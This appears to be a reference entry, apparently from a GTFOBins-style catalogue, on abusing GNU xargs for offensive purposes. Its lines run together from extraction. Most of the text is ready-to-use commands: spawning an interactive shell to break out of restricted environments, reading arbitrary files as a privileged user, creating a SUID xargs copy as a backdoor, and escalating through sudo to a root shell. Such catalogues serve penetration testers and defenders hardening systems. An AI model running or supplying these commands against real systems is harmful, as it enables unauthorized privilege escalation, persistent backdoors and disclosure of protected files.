It can be used to break out from restricted environments by spawning an interactive system shell.
GNU version only.
xargs -a /dev/null shecho x | xargs -Iy sh -c 'exec sh 0<&1'Read interactively from stdin.
xargs -Ix sh -c 'exec sh 0<&1'
x^D^DIt reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
This works as long as the file does not contain the NUL character, also a trailing $'\n' is added. The actual /bin/echo command is executed. GNU version only.
LFILE=file_to_read
xargs -a "$LFILE" -0It runs with the SUID bit set and may be exploited to access the file
system, escalate or maintain access with elevated privileges working as a
SUID backdoor. If it is used to run sh -p, omit the -p argument on systems
like Debian that allow the default sh shell to run with SUID privileges.
GNU version only.
sudo sh -c 'cp $(which xargs) .; chmod +s ./xargs'
./xargs -a /dev/null sh -pIt runs in privileged context and may be used to access the file system,
escalate or maintain access with elevated privileges if enabled on sudo.
GNU version only.
sudo xargs -a /dev/null sh